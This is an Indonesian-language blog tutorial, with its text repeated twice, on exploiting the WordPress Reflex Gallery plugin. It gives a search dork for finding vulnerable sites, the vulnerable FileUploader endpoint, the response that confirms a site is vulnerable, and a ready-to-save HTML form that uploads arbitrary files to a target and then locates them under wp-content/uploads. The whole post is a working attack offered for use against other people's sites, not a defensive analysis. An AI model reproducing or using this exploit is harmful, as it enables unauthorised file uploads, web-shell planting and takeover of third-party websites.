Assalamuallaikum ^_^
ok kita langsung saja ya :D
pertama kita cari target dengan dork berikut :
Dork : inurl:/wp-content/plugins/reflex-gallery/
( silakan dikembangkan lagi :v )
kalau sudah dapat target , masukan exploit berikut :
Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
kalau vuln , maka akan ada tulisan : {"error":"No files were uploaded."}
kemudian buka notepad , dan pastekan script CSRF berikut :
<html> <title>Reflex-Gallery CSRF</title> <form method="POST" action="http://target-anda.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" > <input type="file" name="qqfile"><br> <input type="submit" name="Submit" value="Pwn!"> </form> </html>
tulisan yang berwarna merah silakan ganti dengan target kalian ^_^
kalau sudah , save dengan exsentasi .html dan buka file CSRFnya dengan web browser
upload file kalian , dan klik Pwn!
kalau sukses akan seperti gambar berikut :
disini saya mengupload gambar saja :D
sekarang coba buka : http://target-anda.com/wp-content/uploads/nama file
haah :D
gimana ? mudahkan :)
ok , sekian artikel dari saya ^_^
ok kita langsung saja ya :D
pertama kita cari target dengan dork berikut :
Dork : inurl:/wp-content/plugins/reflex-gallery/
( silakan dikembangkan lagi :v )
kalau sudah dapat target , masukan exploit berikut :
Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
kalau vuln , maka akan ada tulisan : {"error":"No files were uploaded."}
kemudian buka notepad , dan pastekan script CSRF berikut :
<html> <title>Reflex-Gallery CSRF</title> <form method="POST" action="http://target-anda.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" > <input type="file" name="qqfile"><br> <input type="submit" name="Submit" value="Pwn!"> </form> </html>
tulisan yang berwarna merah silakan ganti dengan target kalian ^_^
kalau sudah , save dengan exsentasi .html dan buka file CSRFnya dengan web browser
upload file kalian , dan klik Pwn!
kalau sukses akan seperti gambar berikut :
disini saya mengupload gambar saja :D
sekarang coba buka : http://target-anda.com/wp-content/uploads/nama file
haah :D
gimana ? mudahkan :)
ok , sekian artikel dari saya ^_^
EmoticonEmoticon